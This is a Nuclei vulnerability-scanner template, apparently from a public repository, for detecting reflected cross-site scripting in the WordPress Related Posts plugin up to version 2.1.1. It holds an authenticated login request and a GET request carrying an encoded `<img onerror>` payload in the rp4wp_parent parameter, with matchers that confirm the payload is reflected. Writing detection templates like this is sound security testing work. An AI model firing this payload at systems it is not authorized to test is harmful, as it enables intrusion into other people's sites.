nuclei-templates/vulnerabilities/wordpress/wp-related-post-xss

47 lines
1.2 KiB
Plaintext

id: wp-related-post-xss
info:
name: WordPress Related Posts <= 2.1.1 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent
reference:
- https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/
- https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/
metadata:
verified: true
tags: wordpress,wp,wp-plugin,xss,relatedposts,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>&action=edit'
- 'All Posts</a>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200